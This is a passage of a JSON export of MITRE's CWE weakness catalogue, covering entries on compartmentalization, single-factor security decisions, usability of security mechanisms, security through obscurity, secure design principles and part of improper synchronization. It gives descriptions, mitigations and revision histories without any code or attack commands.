Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Enabling_Factors_for_Exploitation, Modes_of_Introduction, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Unsafe Treatment of XQuery Input","attr":{"@_Date":"2008-10-14"}},{"#text":"Failure to Sanitize Data within XQuery Expressions (aka \'XQuery Injection\')","attr":{"@_Date":"2009-05-27"}},{"#text":"Failure to Sanitize Data within XQuery Expressions (\'XQuery Injection\')","attr":{"@_Date":"2010-04-05"}}]}},"653":{"attr":{"@_ID":"653","@_Name":"Improper Isolation or Compartmentalization","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product does not properly compartmentalize or isolate functionality, processes, or resources that require different privilege levels, rights, or permissions.","Extended_Description":"When a weakness occurs in functionality that is accessible by lower-privileged users, then without strong boundaries, an attack might extend the scope of the damage to higher-privileged users.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"657","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"Separation of Privilege","Description":"Some people and publications use the term \\"Separation of Privilege\\" to describe this weakness, but this term has dual meanings in current usage. This node conflicts with the original definition of \\"Separation of Privilege\\" by Saltzer and Schroeder; that original definition is more closely associated with CWE-654. Because there are multiple interpretations, use of the \\"Separation of Privilege\\" term is discouraged."}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":["Gain Privileges or Assume Identity","Bypass Protection Mechanism"],"Note":"The exploitation of a weakness in low-privileged areas of the software can be leveraged to reach higher-privileged areas without having to overcome any additional obstacles."}},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Compare binary / bytecode to application permission manifest"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Manual Source Code Review (not inspections)"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Focused Manual Spotcheck - Focused manual analysis of source"}}]}},"Effectiveness":"High"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)","Formal Methods / Correct-By-Construction"]}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Attack Modeling"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Break up privileges between different modules, objects, or entities. Minimize the interfaces between modules and require strong access control between them."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"Single sign-on technology is intended to make it easier for users to access multiple resources or domains without having to authenticate each time. While this is highly convenient for the user and attempts to address problems with psychological acceptability, it also means that a compromise of a user\'s credentials can provide immediate access to all other resources or domains."},{"Intro_Text":"The traditional UNIX privilege model provides root with arbitrary access to all resources, but root is frequently the only user that has privileges. As a result, administrative tasks require root privileges, even if those tasks are limited to a small area, such as updating user manpages. Some UNIX flavors have a \\"bin\\" user that is the owner of system executables, but since root relies on executables owned by bin, a compromise of the bin account can be leveraged for root privileges by modifying a bin-owned executable, such as CVE-2007-4238."}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2019-6260","Description":"Baseboard Management Controller (BMC) device implements Advanced High-performance Bus (AHB) bridges that do not require authentication for arbitrary read and write access to the BMC\'s physical address space from the host, and possibly the network [REF-1138].","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6260"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-196"}},{"attr":{"@_External_Reference_ID":"REF-535"}},{"attr":{"@_External_Reference_ID":"REF-1138"}}]},"Notes":{"Note":[{"#text":"There is a close association with CWE-250 (Execution with Unnecessary Privileges). CWE-653 is about providing separate components for each \\"privilege\\"; CWE-250 is about ensuring that each component has the least amount of privileges possible. In this fashion, compartmentalization becomes one mechanism for reducing privileges.","attr":{"@_Type":"Relationship"}},{"#text":"The term \\"Separation of Privilege\\" is used in several different ways in the industry, but they generally combine two closely related principles: compartmentalization (this node) and using only one factor in a security decision (CWE-654). Proper compartmentalization implicitly introduces multiple factors into a security decision, but there can be cases in which multiple factors are required for authentication or other mechanisms that do not involve compartmentalization, such as performing all required checks on a submitted certificate. It is likely that CWE-653 and CWE-654 will provoke further discussion.","attr":{"@_Type":"Terminology"}}]},"Content_History":{"Submission":{"Submission_Name":"Pascal Meunier","Submission_Organization":"Purdue University","Submission_Date":"2008-01-18"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Alternate_Terms, Common_Consequences, Description, Relationships, Other_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Other_Notes, Relationship_Notes, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Design Principle Violation: Insufficient Compartmentalization","attr":{"@_Date":"2009-01-12"}}}},"654":{"attr":{"@_ID":"654","@_Name":"Reliance on a Single Factor in a Security Decision","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"A protection mechanism relies exclusively, or to a large extent, on the evaluation of a single condition or the integrity of a single object or entity in order to make a decision about granting access to restricted resources or functionality.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"657","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"Separation of Privilege","Description":"Some people and publications use the term \\"Separation of Privilege\\" to describe this weakness, but this term has dual meanings in current usage. While this entry is closely associated with the original definition of \\"Separation of Privilege\\" by Saltzer and Schroeder, others use the same term to describe poor compartmentalization (CWE-653). Because there are multiple interpretations, use of the \\"Separation of Privilege\\" term is discouraged."}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":[{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"If the single factor is compromised (e.g. by theft or spoofing), then the integrity of the entire security mechanism can be violated with respect to the user that is identified by that factor."},{"Scope":"Non-Repudiation","Impact":"Hide Activities","Note":"It can become difficult or impossible for the product to be able to distinguish between legitimate activities by the entity who provided the factor, versus illegitimate activities by an attacker."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Use multiple simultaneous checks before granting access to critical operations or granting critical privileges. A weaker but helpful mitigation is to use several successive checks (multiple layers of security)."},{"Phase":"Architecture and Design","Description":"Use redundant access rules on different choke points (e.g., firewalls)."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"Password-only authentication is perhaps the most well-known example of use of a single factor. Anybody who knows a user\'s password can impersonate that user."},{"Intro_Text":"When authenticating, use multiple factors, such as \\"something you know\\" (such as a password) and \\"something you have\\" (such as a hardware-based one-time password generator, or a biometric device)."}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"16"}},{"attr":{"@_CAPEC_ID":"274"}},{"attr":{"@_CAPEC_ID":"49"}},{"attr":{"@_CAPEC_ID":"55"}},{"attr":{"@_CAPEC_ID":"560"}},{"attr":{"@_CAPEC_ID":"565"}},{"attr":{"@_CAPEC_ID":"600"}},{"attr":{"@_CAPEC_ID":"652"}},{"attr":{"@_CAPEC_ID":"653"}},{"attr":{"@_CAPEC_ID":"70"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-196"}},{"attr":{"@_External_Reference_ID":"REF-535"}}]},"Notes":{"Note":{"#text":"This entry is closely associated with the term \\"Separation of Privilege.\\" This term is used in several different ways in the industry, but they generally combine two closely related principles: compartmentalization (CWE-653) and using only one factor in a security decision (this entry). Proper compartmentalization implicitly introduces multiple factors into a security decision, but there can be cases in which multiple factors are required for authentication or other mechanisms that do not involve compartmentalization, such as performing all required checks on a submitted certificate. It is likely that CWE-653 and CWE-654 will provoke further discussion.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"Pascal Meunier","Submission_Organization":"Purdue University","Submission_Date":"2008-01-18"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Alternate_Terms, Common_Consequences, Relationships, Other_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Maintenance_Notes, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Alternate_Terms, Maintenance_Notes"}],"Previous_Entry_Name":{"#text":"Design Principle Violation: Reliance on a Single Factor in a Security Decision","attr":{"@_Date":"2009-01-12"}}}},"655":{"attr":{"@_ID":"655","@_Name":"Insufficient Psychological Acceptability","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software has a protection mechanism that is too difficult or inconvenient to use, encouraging non-malicious users to disable or bypass the mechanism, whether by accident or on purpose.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"657","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"By bypassing the security mechanism, a user might leave the system in a less secure state than intended by the administrator, making it more susceptible to compromise."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Testing","Description":"Where possible, perform human factors and usability studies to identify where your product\'s security mechanisms are difficult to use, and why."},{"Phase":"Architecture and Design","Description":"Make the security mechanism as seamless as possible, while also providing the user with sufficient details when a security decision produces unexpected results."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"In \\"Usability of Security: A Case Study\\" [REF-540], the authors consider human factors in a cryptography product. Some of the weakness relevant discoveries of this case study were: users accidentally leaked sensitive information, could not figure out how to perform some tasks, thought they were enabling a security option when they were not, and made improper trust decisions."},{"Intro_Text":"Enforcing complex and difficult-to-remember passwords that need to be frequently changed for access to trivial resources, e.g., to use a black-and-white printer. Complex password requirements can also cause users to store the passwords in an unsafe manner so they don\'t have to remember them, such as using a sticky note or saving them in an unencrypted file."},{"Intro_Text":"Some CAPTCHA utilities produce images that are too difficult for a human to read, causing user frustration."}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-196"}},{"attr":{"@_External_Reference_ID":"REF-539"}},{"attr":{"@_External_Reference_ID":"REF-540"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 14: Poor Usability.&#34; Page 217"}}]},"Notes":{"Note":{"#text":"This weakness covers many security measures causing user inconvenience, requiring effort or causing frustration, that are disproportionate to the risks or value of the protected assets, or that are perceived to be ineffective.","attr":{"@_Type":"Other"}}},"Content_History":{"Submission":{"Submission_Name":"Pascal Meunier","Submission_Organization":"Purdue University","Submission_Date":"2008-01-18"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Time_of_Introduction"}],"Previous_Entry_Name":[{"#text":"Design Principle Violation: Failure to Satisfy Psychological Acceptability","attr":{"@_Date":"2009-01-12"}},{"#text":"Failure to Satisfy Psychological Acceptability","attr":{"@_Date":"2009-05-27"}}]}},"656":{"attr":{"@_ID":"656","@_Name":"Reliance on Security Through Obscurity","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software uses a protection mechanism whose strength depends heavily on its obscurity, such that knowledge of its algorithms or key data is sufficient to defeat the mechanism.","Extended_Description":"This reliance on \\"security through obscurity\\" can produce resultant weaknesses if an attacker is able to reverse engineer the inner workings of the mechanism. Note that obscurity can be one small part of defense in depth, since it can create more work for an attacker; however, it is a significant risk if used as the primary means of protection.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"657","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"259","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"321","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"472","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"Never Assuming your secrets are safe"}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Other"],"Impact":"Other","Note":"The security mechanism can be bypassed easily."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Always consider whether knowledge of your code or design is sufficient to break it. Reverse engineering is a highly successful discipline, and financially feasible for motivated adversaries. Black-box techniques are established for binary analysis of executables that use obfuscation, runtime analysis of proprietary protocols, inferring file formats, and others."},{"Phase":"Architecture and Design","Description":"When available, use publicly-vetted algorithms and procedures, as these are more likely to undergo more extensive security analysis and testing. This is especially the case with encryption and authentication."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The design of TCP relies on the secrecy of Initial Sequence Numbers (ISNs), as originally covered in CVE-1999-0077. If ISNs can be guessed (due to predictability, CWE-330) or sniffed (due to lack of encryption, CWE-311), then an attacker can hijack or spoof connections. Many TCP implementations have had variations of this problem over the years, including CVE-2004-0641, CVE-2002-1463, CVE-2001-0751, CVE-2001-0328, CVE-2001-0288, CVE-2001-0163, CVE-2001-0162, CVE-2000-0916, and CVE-2000-0328.","References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-542"}}}}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2006-6588","Description":"Reliance on hidden form fields in a web application. Many web application vulnerabilities exist because the developer did not consider that \\"hidden\\" form fields can be processed using a modified client.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6588"},{"Reference":"CVE-2006-7142","Description":"Hard-coded cryptographic key stored in executable program.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7142"},{"Reference":"CVE-2005-4002","Description":"Hard-coded cryptographic key stored in executable program.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4002"},{"Reference":"CVE-2006-4068","Description":"Hard-coded hashed values for username and password contained in client-side script, allowing brute-force offline attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4068"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-196"}},{"attr":{"@_External_Reference_ID":"REF-544"}}]},"Notes":{"Note":{"#text":"Note that there is a close relationship between this weakness and CWE-603 (Use of Client-Side Authentication). If developers do not believe that a user can reverse engineer a client, then they are more likely to choose client-side authentication in the belief that it is safe.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"Pascal Meunier","Submission_Organization":"Purdue University","Submission_Date":"2008-01-18"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Description, Relationships, Other_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Design Principle Violation: Reliance on Security through Obscurity","attr":{"@_Date":"2009-01-12"}}}},"657":{"attr":{"@_ID":"657","@_Name":"Violation of Secure Design Principles","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product violates well-established principles for secure design.","Extended_Description":"This can introduce resultant weaknesses or make it easier for developers to introduce related weaknesses during implementation. Because code is centered around design, it can be resource-intensive to fix design problems.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Other"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-196"}},{"attr":{"@_External_Reference_ID":"REF-546"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2008-01-30","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"662":{"attr":{"@_ID":"662","@_Name":"Improper Synchronization","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software utilizes multiple threads or processes to allow temporary access to a shared resource that can only be exclusive to one process at a time, but it does not properly synchronize these actions, which might cause simultaneous accesses of this resource by multiple threads or processes.","Extended_Description":{"xhtml:p":"Synchronization refers to a variety of behaviors and mechanisms that allow two or more independently-operating processes or threads to ensure that they operate on shared resources in predictable ways that do not interfere with each other.  Some shared resource operations cannot be executed atomically; that is, multiple steps must be guaranteed to execute sequentially, without any interference by other processes.  Synchronization mechanisms vary widely, but they may include locking, mutexes, and semaphores.  When a multi-step operation on a shared resource cannot be guaranteed to execute independent of interference, then the resulting behavior can be unpredictable. Improper synchronization could lead to data or memory corruption, denial of service, etc."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"691","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"362","@_View_ID":"1000"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality","Other"],"Impact":["Modify Application Data","Read Application Data","Alter Execution Logic"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Use industry standard APIs to synchronize your code."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"SIG00-C","Entry_Name":"Mask signals handled by noninterruptible signal handlers"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"SIG31-C","Entry_Name":"Do not access shared objects in signal handlers","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"State synchronization error"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"VNA03-J","Entry_Name":"Do not assume that a group of calls to independently atomic methods is atomic"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP19","Entry_Name":"Missing Lock"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"25"}},{"attr":{"@_CAPEC_ID":"26"}},{"attr":{"@_CAPEC_ID":"27"}},{"attr":{"@_CAPEC_ID":"29"}}]},"Notes":{"Note":{"#text":"Deeper research is necessary for synchronization and related mechanisms, including locks, mutexes, semaphores, and other mechanisms. Multiple entries are dependent on this research, which includes relationships to concurrency, race conditions, reentrant functions, etc.  CWE-662 and its children - including CWE-667, CWE-820, CWE-821, and others - may need to be modified significantly, along with their relationships.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2008-04-11","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated 